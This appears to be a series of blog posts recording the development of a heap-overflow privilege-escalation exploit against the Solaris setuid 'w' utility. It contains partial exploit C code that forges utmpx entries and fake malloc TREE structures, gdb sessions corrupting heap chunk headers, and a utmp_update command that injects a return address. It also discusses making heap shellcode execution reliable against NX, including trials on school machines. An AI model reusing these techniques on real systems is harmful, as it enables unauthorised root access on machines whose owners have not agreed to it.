while( --argc > 0 && (*++argv)[0] == '-')
while(c = *++argv[0]) //bug to investigate: what are the side effects of c == *++argv[0], which was a bug before the fix.
switch (c) {
case 't':
return 1;
break;
default:
printf("illegal option %c\n", c);
argc = 0;
break;
}
//if( argc != 1)
//printf("Usage: tail [-n #]\n");
return 0;
}
// need function protos
stat_utmpx();
align_utmpx();
size_t gsizeof_utmpx_file;
int entries;
uint32_t TREE_base_addr;
necessary_init()
{
init_table();
// WARNING. THIS CODE ASSUMES the TTY PATH is /dev/pts/****
// definitely gotta strip tty name
ttyn = ttyname(0);
ttyn = strrchr(ttyn, '/');
ttyn++;
//ttyn += 5; // remove "/dev/"
//ttyn += 4; // remove "pts/"
// I just want the number :D
fprintf (stderr, "tty number is %s\n", ttyn);
}
main(int argc, char **argv)
{
prog = argv[0];
necessary_init();
if (processclargs(argc,argv))
{
return dotests();
}
align_utmpx();
}
// should do a faster routine during actual "fork parent watch for utmpx access"
int stat_utmpx(struct stat *statbuf)
{
if (stat(UTMPX_FILE, statbuf) == ERR) {
(void) fprintf(stderr, "%s: stat error of %s: %s\n",
prog, UTMPX_FILE, strerror(errno));
exit(1);
}
utmpx_last_access_time = statbuf->st_atime;
// The above should really be called again before forking off an instance
// of 'w'
// and don't forget to sleep(2) in the child before exec'ing to ensure the access time is accurate
// atime is only precise to the second..
fprintf (stderr, "statbuf.st_size = %d\n", statbuf->st_size);
fprintf (stderr, "sizeof struct futmpx = 0x%x\n", sizeof(struct futmpx));
entries = statbuf->st_size / sizeof (struct futmpx);
fprintf (stderr, "NumEntries = 0x%x\n", entries);
return sizeof (struct utmpx) * entries;
}
// this would be for heap-based execution method
//int smart_build_prefix=0;
align_utmpx()
{
int tmp;
/* The W_HEAPBUF_BASEADDR +gsizeof_utmpx_file will be the base address of the TREE structure
It MUST be 8-byte aligned
if it's not aligned, we simply add a pre-entry to get on TRACK.
*/
gsizeof_utmpx_file = stat_utmpx(&gstatbuf);
TREE_base_addr = gsizeof_utmpx_file + W_HEAPBUF_BASEADDR;
if ( (tmp = TREE_base_addr % 8))
{
if (tmp == 4)
{
int newsize=0;
// FOR STACK BASED EXECUTION WE WANT IT == 0, but for HEAP-BASED EXECUTION, w
// want it at 4...
//smart_build_prefix=4;
fprintf (stderr, "Adding pre-entry for 8-byte alignment\n");
add_pre_entry();
// VERIFYING ENTRY SIZE
newsize = stat_utmpx(&gstatbuf);
assert ( (newsize == (gsizeof_utmpx_file + UTMPX_ENTRY_SIZE)) && !(newsize % 8) );
TREE_base_addr = newsize;
}
// NOTE ON HEAP_BASED_EXECUTION with smart alignment:
// Well, in this case, only have 32-4 bytes to work with in ut_name[]
// I will some sort of index_variable which will SMART_BUILD the entry
//
// Later do some sort of namelen(32) - smart_build_prefix = room to work with
/**/
else
{
fprintf(stderr, "WTF?!?!?!");
exit(9);
}
}
// NOW update the TREE_base_addr to reflect new entry
fprintf (stderr, "TREE_base_addr = 0x%x\n", TREE_base_addr);
assert (!(TREE_base_addr % 8));
// ADD FAKE TREE STRUCT ENTRY
system(string_builder_for_utmp_update_FAKE_TREE());
}
// Because in my case the ID is the TARGET address :\
// make sure, don't waste a pre-entry on valuable TARGET SPACE
int is_addr_in_target_space(uint32_t *addr)
{
if (*addr < TARGET_MIN || *addr > TARGET_MAX)
return 0;
else return 1;
}
// everything starts at 1 cause I'm not fucking with null bytes
find_free_id_not_stack(char *p)
{
uint16_t four=1,three=1,two=1,one=1;
uint8_t bit_index=1;
for (four=1; four < UPPER_LIMIT; four++)
{
for (three=1; three < 256; three++)
{
for (two=1; two < 256; two++)
{
bit_index=1;
for (one=0; one < 32; one++)
{
for (; bit_index < 8; bit_index++)
{
if (table[four][three][two][one] & (1 << bit_index) == 0)
{
// found a freebie
p[0] = four;
p[1] = three;
p[2] = two;
p[3] = (one * 8) + bit_index;
uint32_t *addr = (uint32_t *)p;
if (!is_addr_in_target_space(addr)) // address pass intentional
{
table[four][three][two][one] |= (1 << bit_index);
return;
}
}
}
// I started with bit_index=1 to skip the NULL byte case
bit_index=0;
// when one=0, but after that (one > 0) the bit_index @ 0 will reflect
// values beyond 0 so it's OK
}
}
}
}
}
add_utmpx_entry(char *name, char *id)
{
}
add_generic_utmpx_entry()
{
}
add_pre_entry()
{
char id[5];
bzero(id, 5);
// find a free_id and make sure it's not in our
// stack_space!
find_free_id_not_stack(id);
add_generic_utmpx_entry();
// That function will wrap around something more powerful
}
Posted in Uncategorized
Analysis Utilities — Pt. 13
Yes, The TREE Structure in the TREE UTMPX Entry must start on WORD-aligned boundary (8-byte aligned 32 bits), (16-byte aligned address on 64-bit)
To understand the 32/64 TREE structure in raw form:
bazz@blade72[pts/3][/tmp] cat malloc.c
#include <stdlib.h>
#include <memory.h>
#include <thread.h>
#include <synch.h>
#define WORDSIZE (sizeof (WORD))
#ifdef _LP64
#define ALIGN 16
#else
#define ALIGN 8
#endif
/* the proto-word; size must be ALIGN bytes */
typedef union _w_ {
size_t w_i; /* an unsigned int */
struct _t_ *w_p; /* a pointer */
char w_a[ALIGN]; /* to force size */
} WORD;
main()
{
printf ("sizeof WORD = 0x%x\n", WORDSIZE);
printf ("ALIGN is %d\n", ALIGN);
WORD w;
w.w_i = 1;
printf ("w = %d\n", w.w_i);
unsigned char *c = (char *)&w;
int i;
for (i=0; i < WORDSIZE; i++)
{
printf ("w[%d] = 0x%1x \n", i, *(c++));
}
printf ("\n");
w.w_i = -1;
printf ("w = %d\n", w.w_i);
c = (char *)&w;
for (i=0; i < WORDSIZE; i++)
{
printf ("w[%d] = 0x%1x\n", i, *(c++));
}
printf ("\n");
}
bazz@blade72[pts/3][/tmp] gcc malloc.c && ./a.out
sizeof WORD = 0x8
ALIGN is 8
w = 1
w[0] = 0x0
w[1] = 0x0
w[2] = 0x0
w[3] = 0x1
w[4] = 0x0
w[5] = 0x0
w[6] = 0x0
w[7] = 0x0
w = -1
w[0] = 0xff
w[1] = 0xff
w[2] = 0xff
w[3] = 0xff
w[4] = 0x0
w[5] = 0x0
w[6] = 0x0
w[7] = 0x0
bazz@blade72[pts/3][/tmp] gcc -m64 malloc.c && ./a.out
sizeof WORD = 0x10
ALIGN is 16
w = 1
w[0] = 0x0
w[1] = 0x0
w[2] = 0x0
w[3] = 0x0
w[4] = 0x0
w[5] = 0x0
w[6] = 0x0
w[7] = 0x1
w[8] = 0x0
w[9] = 0x0
w[10] = 0x0
w[11] = 0x0
w[12] = 0x0
w[13] = 0x0
w[14] = 0x0
w[15] = 0x0
w = -1
w[0] = 0xff
w[1] = 0xff
w[2] = 0xff
w[3] = 0xff
w[4] = 0xff
w[5] = 0xff
w[6] = 0xff
w[7] = 0xff
w[8] = 0x0
w[9] = 0x0
w[10] = 0x0
w[11] = 0x0
w[12] = 0x0
w[13] = 0x0
w[14] = 0x0
w[15] = 0x0
bazz@blade72[pts/3][/tmp] cat malloc.c
#include <stdlib.h>
#include <memory.h>
#include <thread.h>
#include <synch.h>
#define WORDSIZE (sizeof (WORD))
#ifdef _LP64
#define ALIGN 16
#else
#define ALIGN 8
#endif
/* the proto-word; size must be ALIGN bytes */
typedef union _w_ {
size_t w_i; /* an unsigned int */
struct _t_ *w_p; /* a pointer */
char w_a[ALIGN]; /* to force size */
} WORD;
main()
{
printf ("sizeof WORD = 0x%x\n", WORDSIZE);
printf ("ALIGN is %d\n", ALIGN);
}
bazz@blade72[pts/3][/tmp] gcc malloc.c && ./a.out
sizeof WORD = 0x8
ALIGN is 8
bazz@blade72[pts/3][/tmp] gcc -m64 malloc.c && ./a.out
sizeof WORD = 0x10
ALIGN is 16
bazz@blade72[pts/3][/tmp]
Demontrated difference between ALIGN on 32-bit vs. 64-bit exe.. ALIGN is used in malloc implementation.
Check to see if strncpy puts data after null byte into destination. It doesnt :(
bazz@blade72[pts/3][/tmp] cat strncpy.c
#include <string.h>
main()
{
char buf[32] = "LALALA\x00\xde\xad\xbe\xef";
char buf2[32];
strncpy(buf2, buf, 30);
int i;
for (i=0; i<32; i++)
{
printf ("buf2[%d] = 0x%1x\n", i, buf2[i]);
}
}
bazz@blade72[pts/3][/tmp] gcc strncpy.c && ./a.out
buf2[0] = 0x4c
buf2[1] = 0x41
buf2[2] = 0x4c
buf2[3] = 0x41
buf2[4] = 0x4c
buf2[5] = 0x41
buf2[6] = 0x0
buf2[7] = 0x0
buf2[8] = 0x0
buf2[9] = 0x0
buf2[10] = 0x0
buf2[11] = 0x0
buf2[12] = 0x0
buf2[13] = 0x0
buf2[14] = 0x0
buf2[15] = 0x0
buf2[16] = 0x0
buf2[17] = 0x0
buf2[18] = 0x0
buf2[19] = 0x0
buf2[20] = 0x0
buf2[21] = 0x0
buf2[22] = 0x0
buf2[23] = 0x0
buf2[24] = 0x0
buf2[25] = 0x0
buf2[26] = 0x0
buf2[27] = 0x0
buf2[28] = 0x0
buf2[29] = 0x0
buf2[30] = 0x0
buf2[31] = 0x0
bazz@blade72[pts/3][/tmp]
Posted in Uncategorized
3 Things today — Pt. 12
1 thing: Compiling 64-bit GDB
2 : Analyzing how the heap could be brute-forced in this exploit.
3: Discovering that the address returned by malloc is consistent across runs, on different machines!! With different UTMPX file sizes!! AWESOME!! The stack doesn’t have to be brute-forced!!! I will over-write the LD linker thing to point to the UTMPX-Shellcode which is located in the heap offsetted by the recorded malloc return address entry and blam!! We are singing!! <3
3-2) in summary, if you have read access to the executable it can be copied and debugged to find the base malloc offset to aid in one-timing a heap-based overflow on a NX stack-based executable/OS. If the exe is not readable, but there is an executable stack, you're still in luck! And can execute directly into a giant NOP sled...
Even if the exe is not readable, it can always become readable by installing an identical copy of the OS in your lab.. :)
Another thing I double checked, ulab, blade72, blade60 all have the same exact copy of /usr/bin/sparcv7/w
I expect the 64-bit version to be the same as well..
Solaris 10 doesn't seem to have the 32-bit W...
Solaris 10 patch:
$NetBSD: patch-ob,v 1.1 2008/01/06 19:25:10 rillig Exp $
gcc4 complained:
gdbtypes.c:2961: error: invalid lvalue in increment
--- include/obstack.h.orig 2001-01-21 00:02:00.000000000 +0000
+++ include/obstack.h 2007-11-30 21:04:44.000000000 +0000
@@ -421,7 +421,7 @@ __extension__ \
({ struct obstack *__o = (OBSTACK); \
if (__o->next_free + sizeof (void *) > __o->chunk_limit) \
_obstack_newchunk (__o, sizeof (void *)); \
- *((void **)__o->next_free)++ = ((void *)datum); \
+ *((*(void ***)&(__o->next_free)))++ = ((void *)datum); \
(void) 0; })
# define obstack_int_grow(OBSTACK,datum) \
@@ -429,7 +429,7 @@ __extension__ \
({ struct obstack *__o = (OBSTACK); \
if (__o->next_free + sizeof (int) > __o->chunk_limit) \
_obstack_newchunk (__o, sizeof (int)); \
- *((int *)__o->next_free)++ = ((int)datum); \
+ *((*(int **)&(__o->next_free)))++ = ((int)datum); \
(void) 0; })
# define obstack_ptr_grow_fast(h,aptr) (*((void **) (h)->next_free)++ = (void *)aptr)
1. Let’s compile GDB 5.3 (same as 32bit present on blade72) without intl errors:
export CC=”gcc -m64″
./configure –prefix=/home/bazz/tools –with-included-gettext –disable-nls
# on my Solaris 10 box:
ln -s /opt/csw/bin/gar /opt/csw/bin/ar
3: Analysis of Heap address space in 64-bit version vs. 32 bit.. and across machines…
64:
Mapped address spaces:
Start Addr End Addr Size Offset Flags
0x100000000 0x100003fff 0x4000 0 ----r-x
0x100102000 0x100103fff 0x2000 0x2000 ----rwx
0x100104000 0x10011bfff 0x18000 0 --b-rwx
0xffffffff7ef00000 0xffffffff7ef01fff 0x2000 0 ----rwx
0xffffffff7f000000 0xffffffff7f003fff 0x4000 0 ----r-x
0xffffffff7f100000 0xffffffff7f101fff 0x2000 0 ----rwx
0xffffffff7f200000 0xffffffff7f2b5fff 0xb6000 0 ----r-x
0xffffffff7f3b6000 0xffffffff7f3c3fff 0xe000 0xb6000 ----rwx
0xffffffff7f3c4000 0xffffffff7f3c5fff 0x2000 0 ----rwx
0xffffffff7f500000 0xffffffff7f501fff 0x2000 0 ----rwx
0xffffffff7f600000 0xffffffff7f62dfff 0x2e000 0 ----r-x
0xffffffff7f72e000 0xffffffff7f731fff 0x4000 0x2e000 ----rwx
0xffffffff7fffc000 0xffffffff7fffffff 0x4000 0xffffe000 -s--rw-
(gdb) p/x $o0
$1 = 0x100115c00
(gdb)
$o0 is malloc return pointer in heap space..
32
(gdb) p/x $o0
$4 = 0x30770
(gdb) info proc map
process 14893 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_FAULTED : Incurred a traced hardware fault FLTBPT: Breakpoint trap
Mapped address spaces:
Start Addr End Addr Size Offset Flags
0x10000 0x13fff 0x4000 0 ----r-x
0x22000 0x23fff 0x2000 0x2000 ----rwx
0x24000 0x33fff 0x10000 0 --b-rwx
0xff280000 0xff32bfff 0xac000 0 ----r-x
0xff33c000 0xff343fff 0x8000 0xac000 ----rwx
0xff370000 0xff371fff 0x2000 0 ----rwx
0xff380000 0xff383fff 0x4000 0 ----r-x
0xff390000 0xff391fff 0x2000 0 ----rwx
0xff3b0000 0xff3dffff 0x30000 0 ----r-x
0xff3e0000 0xff3e1fff 0x2000 0x30000 ----rwx
0xff3e2000 0xff3e3fff 0x2000 0 ----rwx
0xffbee000 0xffbeffff 0x2000 0 -s--rwx
(gdb)
I found that on 64 bit address, the offset returned by malloc from heap_start is 0x11C00.
Whereas on 32 bit, it was 0xC770.. No correlation there I don’t thnk..
BUT MOST IMPORTANTLY — will that offset ALWAYS be MAINTAINED???
If so, we can reliably predict where in the heap our SHELLCODE UTMPX ENTRY resides :D
I just tested on Blade72 vs. Blade71. Although they are very similar machines, they both start up the heap at the same spot!! <3 Ulab also does its heap at teh same spot.. So does blade60.. 0x30770 Of course, I am debugging these binaries without the SUID bit set.. I copied them into my home directory.. I wonder if the thing would stay the same with it set??? I also note that the Sparcv7 binary of W has it's stack space NX by default! regardless of system setting?? The 64bit malloc base address is the same on blade72 and ulab as well.. 0x100115c00 Geeze :D -- with this ability to debug the program being consistent across to the SUID execution (will be checked on LIFE).. then that means holy cow!! <3 We can have an NX heap-based execution of shellcode that is 100% reliable :D
Posted in Uncategorized
Being Awesome Pt. 11
No this is really a comparison of Stack space between Solaris 10 and Solaris 8.. at least the machines in question..
Solaris 10 box:
without one-million argV[1]:
0xffbfe000 0xffbfffff 0x2000 0 -s–rwx
with it:
0xffb0a000 0xffbfffff 0xf6000 0 -s–rwx
Solaris 8 box:
Without:
0xffbee000 0xffbeffff 0x2000 0 -s–rwx
With:
0xffaf8000 0xffbeffff 0xf8000 0xffffe000 -s–rwx
Actually wat happens is :
TOP OF STACK
———–
init stuffz??
HUGE
FUCKING
STRING
ARGV[1]
Program stuffz..
————-
So it’s actually better to shoot near the top of stack ish lower.
something like 0xffbee008
But how does argv[1] get mapped?? Beats me.. I think I can just go with the flow on this one.. and the shellcode NOP sled will be right where it should..
(gdb) r
Starting program: /home/bazz/blade72/w_32
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)
Breakpoint 1, 0x00010ec8 in main ()
(gdb) info proc map
process 2222 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_MSACCT Microstate accounting enabled
PR_PCOMPAT Micro-state accounting inherited on fork
PR_FAULTED : Incurred a traced hardware fault FLTBPT: Breakpoint trap
Mapped address spaces:
Start Addr End Addr Size Offset Flags
0x10000 0x13fff 0x4000 0 ----r-x
0x22000 0x23fff 0x2000 0x2000 ----rwx
0x24000 0x2ffff 0xc000 0 --b-rwx
0xff280000 0xff357fff 0xd8000 0 ----r-x
0xff368000 0xff36ffff 0x8000 0xd8000 ----rwx
0xff370000 0xff371fff 0x2000 0 ----rwx
0xff3a0000 0xff3a5fff 0x6000 0 ----rwx
0xff3b0000 0xff3ddfff 0x2e000 0 ----r-x
0xff3ee000 0xff3effff 0x2000 0x2e000 ----rwx
0xff3f0000 0xff3f1fff 0x2000 0 ----rwx
0xffbfe000 0xffbfffff 0x2000 0 -s--rwx
(gdb) r `perl -e 'print "A"x1000000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/blade72/w_32 `perl -e 'print "A"x1000000'`
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)
Breakpoint 1, 0x00010ec8 in main ()
(gdb) info proc map
process 2223 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_MSACCT Microstate accounting enabled
PR_PCOMPAT Micro-state accounting inherited on fork
PR_FAULTED : Incurred a traced hardware fault FLTBPT: Breakpoint trap
Mapped address spaces:
Start Addr End Addr Size Offset Flags
0x10000 0x13fff 0x4000 0 ----r-x
0x22000 0x23fff 0x2000 0x2000 ----rwx
0x24000 0x2ffff 0xc000 0 --b-rwx
0xff280000 0xff357fff 0xd8000 0 ----r-x
0xff368000 0xff36ffff 0x8000 0xd8000 ----rwx
0xff370000 0xff371fff 0x2000 0 ----rwx
0xff3a0000 0xff3a5fff 0x6000 0 ----rwx
0xff3b0000 0xff3ddfff 0x2e000 0 ----r-x
0xff3ee000 0xff3effff 0x2000 0x2e000 ----rwx
0xff3f0000 0xff3f1fff 0x2000 0 ----rwx
0xffb0a000 0xffbfffff 0xf6000 0 -s--rwx
(gdb)
Posted in Uncategorized
Raw dissection of malloc – Pt. 10
Sorry this section and possibly others are not ordered properly.. It is raw research slate.
Here is why ut_line parsing is important.. The test has lots of requirements to satisfy.. must be in /dev/ directory.. we have to be able to open the file and that file must be a tty.. Normally, we shouldn’t be able to re-use our tty name (ie. pts/1), but we can! by doing tricks like pts//1 pts///1 we can create new utmpx entries with the correct access rights. Note: “..” cannot be used in the path name..
Thus, the ut_line[32] – strlen (“ptsN”) = 27 slashes.. beautiful..
Note 2: The same ut_line can be used for an entry with a different ID, at least for DEAD PROCESSES (seriously, fuck USER_PROCESS’S) . In fact, whole entries can be replicated merily by changing the ID.. but 0x0A must not be present in final byte of the ID, because it is the same as the byte not being there, meaning it will match the entry if it exists of the first 3 bytes in the ID..
Here’s a cool snippet of me hacking the utmp_update command:
Note: utmp_update is smart enough to disallow you from modifying a USER_PROCESS (7) entry for a different user name than your own.. You can, however, add DEAD_PROCESS entries for any username, including “TREE” structure usernames ;)
-bash-3.00$ /usr/lib/utmp_update "bazz" `perl -e 'print "\xff\xbe\xef\x08" '` "pts/////////2" "9000" "7" "10" "1" "100000" "10000" "4" "aa" "4" "bazz" -bash-3.00$ w 11:31pm up 9:26, 2 users, load average: 0.02, 0.02, 0.01 User tty login@ idle JCPU PCPU what bazz pts/2 5:03pm 5 w bazz pts/3 5:06pm 9 31 -bash bazz pts///////// 1Jan70 -bash-3.00$
Although the return address is the “ID” field of struct utmpx, it can be “uniq” in that with NOP sled we can always change it in order to get back to the tail entry of UTMPX file.
OK and I have just confirmed exploitability is persistent across my Solaris 10 box to the school’s Blade72 box.. :D Great!
Well if I upload the chunk before endutxent() as used | 0x09, it will work.. ? Yes.. I took note of the former value there having it’s LSb set, so I copied that trend and am on to awesomeville.
(gdb) set *0x31488 = 0x41414109 (gdb) c Continuing. Breakpoint 10, 0x00011114 in main () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0xff2d4810 in realfree () from /lib/libc.so.1 (gdb)
OMG THAT WORKED!!! <3 Something happens in endutxent(), whereis I can't seem to cause heap overflow BEFORE the call, but i can AFTER.. hmm...
(gdb) r
Starting program: /home/bazz/blade72/w_32 -h foo
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Breakpoint 8, 0x0001110c in main ()
(gdb) x/14i $pc
0x1110c <main+584>: call 0x22508 <endutxent@plt>
0x11110 <main+588>: nop
0x11114 <main+592>: sethi %hi(0x22800), %o0
0x11118 <main+596>: mov %i4, %l1
0x1111c <main+600>: add %o0, 0x1e8, %i0
0x11120 <main+604>: call 0x22514 <time@plt>
0x11124 <main+608>: mov %i0, %o0
0x11128 <main+612>: sethi %hi(0x22400), %g2
0x1112c <main+616>:
ld [ %g2 + 0x360 ], %g2 ! 0x22760 <_etext+127640>
0x11130 <main+620>: cmp %g2, 0
0x11134 <main+624>: be 0x113c8 <main+1284>
0x11138 <main+628>: sethi %hi(0x12000), %g2
0x1113c <main+632>: call 0x11e80 <_etext+59832>
0x11140 <main+636>: mov %i0, %o0
(gdb) x/x 0x31484
0x31484: 0x00000000
(gdb)
0x31488: 0x00002009
(gdb)
0x3148c: 0x00000000
(gdb) set *0x31488 = 0x41414100
(gdb) c
Continuing.
Program exited normally.
(gdb) b *0x11114
Breakpoint 10 at 0x11114
(gdb) r
Starting program: /home/bazz/blade72/w_32 -h foo
(no debugging symbols found)
warning: Temporarily disabling breakpoints for unloaded shared library "/usr/lib/ld.so.1"
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
Breakpoint 8, 0x0001110c in main ()
(gdb) c
Continuing.
Breakpoint 10, 0x00011114 in main ()
(gdb) set *0x31488 = 0x41414100
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2d4810 in realfree () from /lib/libc.so.1
(gdb)
MAKE SURE 8-byte-aligned :O To ensure 8-byte alignment.. We need to count the UTMPX entries up ourselves..
(gdb) x/x $o0 + 0xd14 0x31484: 0x00000000 (gdb) x/x $o0 + 0xd18 0x31488: 0x000004c0 (gdb)
That’s OK, we can account for this by putting several “RETURN ADDRESSES”
This is because malloc is behaving, or something is different on systems at school… I see where I was getting tripped up. For some reason, it seems that UTMPX entries are showing up in HEAP space AFTER our malloc’d space.. weird… but just stay true to the ol’ adage: Chunk size = malloc’d return + size..
good breakpoints.. get the malloc return val.. but this is really just the size of /var/adm/utmpx..
it’s the return value we want.. then add it to get the address of the chunk size.
(gdb) i b
Num Type Disp Enb Address What
1 breakpoint keep y 0x00011114 <main+592>
6 breakpoint keep y 0x000110ac <main+488>
breakpoint already hit 1 time
7 breakpoint keep y 0x000110b4 <main+496>
breakpoint already hit 1 time
(gdb)
While I should through in my raw dissection of malloc to a point… Let me do that.. just a second…
I literally have no idea how I figured it out
bazz@AwesomeSauce[~] sshBlade72
This shell is interactive
bazz@blade72[pts/3][~] ./w_32
7:34pm up 595 day(s), 5:44, 3 users, load average: 0.00, 0.01, 0.01
User tty login@ idle JCPU PCPU what
bazz pts/1 5:10pm 22 /home/bazz/w_32
bazz pts/2 7:23pm /home/bazz/w_32
bazz pts/3 7:34pm ./w_32
bazz@blade72[pts/3][~] ./w_32 -h
bazz pts/1 5:10pm 22 /home/bazz/w_32
bazz pts/2 7:23pm /home/bazz/w_32
bazz pts/3 7:34pm ./w_32 -h
bazz@blade72[pts/3][~] gdb ./w_32
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...(no debugging symbols found)...
/home/bazz/.gdb: No such file or directory.
(gdb) r
Starting program: /home/bazz/w_32
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)... 7:34pm up 595 day(s), 5:44, 3 users, load average: 0.00, 0.01, 0.01
User tty login@ idle JCPU PCPU what
bazz pts/1 5:10pm 22 /home/bazz/w_32
bazz pts/2 7:23pm /home/bazz/w_32
bazz pts/3 7:34pm /home/bazz/w_32
Program exited normally.
(gdb) disas main
Dump of assembler code for function main:
0x10ec4 <main>: save %sp, -1992, %sp
0x10ec8 <main+4>: sethi %hi(0x12000), %g2
0x10ecc <main+8>: mov %i0, %i3
0x10ed0 <main+12>: add %g2, 0x194, %o1
0x10ed4 <main+16>: call 0x22490 <setlocale>
0x10ed8 <main+20>: mov 6, %o0
0x10edc <main+24>: sethi %hi(0x12000), %g2
0x10ee0 <main+28>: call 0x2249c <textdomain>
0x10ee4 <main+32>: add %g2, 0x198, %o0 ! 0x12198 <_lib_version+8>
0x10ee8 <main+36>: ld [ %i1 ], %g2
0x10eec <main+40>: ldsb [ %g2 ], %g2
0x10ef0 <main+44>: cmp %g2, 0x2d
0x10ef4 <main+48>: mov 1, %g2
0x10ef8 <main+52>: be 0x10f04 <main+64>
0x10efc <main+56>: sethi %hi(0x22800), %l0
0x10f00 <main+60>: clr %g2
0x10f04 <main+64>: ld [ %i1 ], %o0
0x10f08 <main+68>: st %g2, [ %l0 + 0x1ec ]
0x10f0c <main+72>: call 0x224a8 <strrchr>
0x10f10 <main+76>: mov 0x2f, %o1
0x10f14 <main+80>: ld [ %l0 + 0x1ec ], %g2
0x10f18 <main+84>: cmp %g2, 0
0x10f1c <main+88>: be 0x10f34 <main+112>
0x10f20 <main+92>: orcc %g0, %o0, %o0
0x10f24 <main+96>: ld [ %i1 ], %g2
0x10f28 <main+100>: ldsb [ %g2 + 1 ], %o0
0x10f2c <main+104>: b 0x10f54 <main+144>
0x10f30 <main+108>: sethi %hi(0x22800), %g2
0x10f34 <main+112>: bne 0x10f4c <main+136>
0x10f38 <main+116>: nop
0x10f3c <main+120>: ld [ %i1 ], %g2
0x10f40 <main+124>: ldsb [ %g2 ], %o0
---Type <return> to continue, or q <return> to quit---
0x10f44 <main+128>: b 0x10f54 <main+144>
0x10f48 <main+132>: sethi %hi(0x22800), %g2
0x10f4c <main+136>: ldsb [ %o0 + 1 ], %o0
0x10f50 <main+140>: sethi %hi(0x22800), %g2
0x10f54 <main+144>: stb %o0, [ %g2 + 0x1f0 ] ! 0x229f0 <_edata+566>
0x10f58 <main+148>: sethi %hi(0x22800), %g3
0x10f5c <main+152>: cmp %i0, 1
0x10f60 <main+156>: ld [ %i1 ], %g2
0x10f64 <main+160>: st %g2, [ %g3 + 0x1f8 ]
0x10f68 <main+164>: ble 0x11070 <main+428>
0x10f6c <main+168>: sethi %hi(0x12000), %g2
0x10f70 <main+172>: ld [ %i1 + 4 ], %o1
0x10f74 <main+176>: sethi %hi(0x2f400), %g2
0x10f78 <main+180>: add %g2, 0x201, %i0 ! 0x2f601 <_ctype+1>
0x10f7c <main+184>: ldsb [ %o1 ], %o0
0x10f80 <main+188>: cmp %o0, 0x2d
0x10f84 <main+192>: bne,a 0x11040 <main+380>
0x10f88 <main+196>: ldub [ %o0 + %i0 ], %g2
0x10f8c <main+200>: ldsb [ %o1 + 1 ], %o0
0x10f90 <main+204>: cmp %o0, 0
0x10f94 <main+208>: be 0x11058 <main+404>
0x10f98 <main+212>: mov 1, %i2
0x10f9c <main+216>: cmp %o0, 0x75
0x10fa0 <main+220>: bge 0x10fc8 <main+260>
0x10fa4 <main+224>: cmp %o0, 0x68
0x10fa8 <main+228>: be 0x10fe4 <main+288>
0x10fac <main+232>: cmp %o0, 0x6c
0x10fb0 <main+236>: be 0x10ff4 <main+304>
0x10fb4 <main+240>: cmp %o0, 0x73
0x10fb8 <main+244>: be,a 0x1100c <main+328>
0x10fbc <main+248>: sethi %hi(0x22400), %g2
0x10fc0 <main+252>: b 0x11910 <main+2636>
0x10fc4 <main+256>: sethi %hi(0x12000), %g2
---Type <return> to continue, or q <return> to quit---
0x10fc8 <main+260>: cmp %o0, 0x75
0x10fcc <main+264>: be 0x11018 <main+340>
0x10fd0 <main+268>: cmp %o0, 0x77
0x10fd4 <main+272>: be,a 0x1101c <main+344>
0x10fd8 <main+276>: sethi %hi(0x22800), %g2
0x10fdc <main+280>: b 0x11910 <main+2636>
0x10fe0 <main+284>: sethi %hi(0x12000), %g2
0x10fe4 <main+288>: sethi %hi(0x22400), %g2
0x10fe8 <main+292>: clr [ %g2 + 0x360 ] ! 0x22760 <___Argv+4>
0x10fec <main+296>: b 0x11024 <main+352>
0x10ff0 <main+300>: inc %i2
0x10ff4 <main+304>: sethi %hi(0x22400), %g2
0x10ff8 <main+308>: ld [ %g2 + 0x364 ], %g3 ! 0x22764 <___Argv+8>
0x10ffc <main+312>: inc %g3
0x11000 <main+316>: st %g3, [ %g2 + 0x364 ]
0x11004 <main+320>: b 0x11024 <main+352>
0x11008 <main+324>: inc %i2
0x1100c <main+328>: clr [ %g2 + 0x364 ]
0x11010 <main+332>: b 0x11024 <main+352>
0x11014 <main+336>: inc %i2
0x11018 <main+340>: sethi %hi(0x22800), %g2
0x1101c <main+344>: stb %o0, [ %g2 + 0x1f0 ] ! 0x229f0 <_edata+566>
0x11020 <main+348>: inc %i2
0x11024 <main+352>: ld [ %i1 + 4 ], %g2
0x11028 <main+356>: ldsb [ %g2 + %i2 ], %o0
0x1102c <main+360>: cmp %o0, 0
0x11030 <main+364>: bne 0x10fa0 <main+220>
0x11034 <main+368>: cmp %o0, 0x75
0x11038 <main+372>: b 0x1105c <main+408>
0x1103c <main+376>: dec %i3
0x11040 <main+380>: btst 7, %g2
0x11044 <main+384>: be 0x11944 <main+2688>
0x11048 <main+388>: cmp %i3, 2
---Type <return> to continue, or q <return> to quit---
0x1104c <main+392>: bg 0x11944 <main+2688>
0x11050 <main+396>: sethi %hi(0x22800), %g2
0x11054 <main+400>: st %o1, [ %g2 + 0x1f4 ] ! 0x229f4 <_edata+570>
0x11058 <main+404>: dec %i3
0x1105c <main+408>: add %i1, 4, %i1
0x11060 <main+412>: cmp %i3, 1
0x11064 <main+416>: bg,a 0x10f7c <main+184>
0x11068 <main+420>: ld [ %i1 + 4 ], %o1
0x1106c <main+424>: sethi %hi(0x12000), %g2
0x11070 <main+428>: add %g2, 0x1dc, %o0 ! 0x121dc <_lib_version+76>
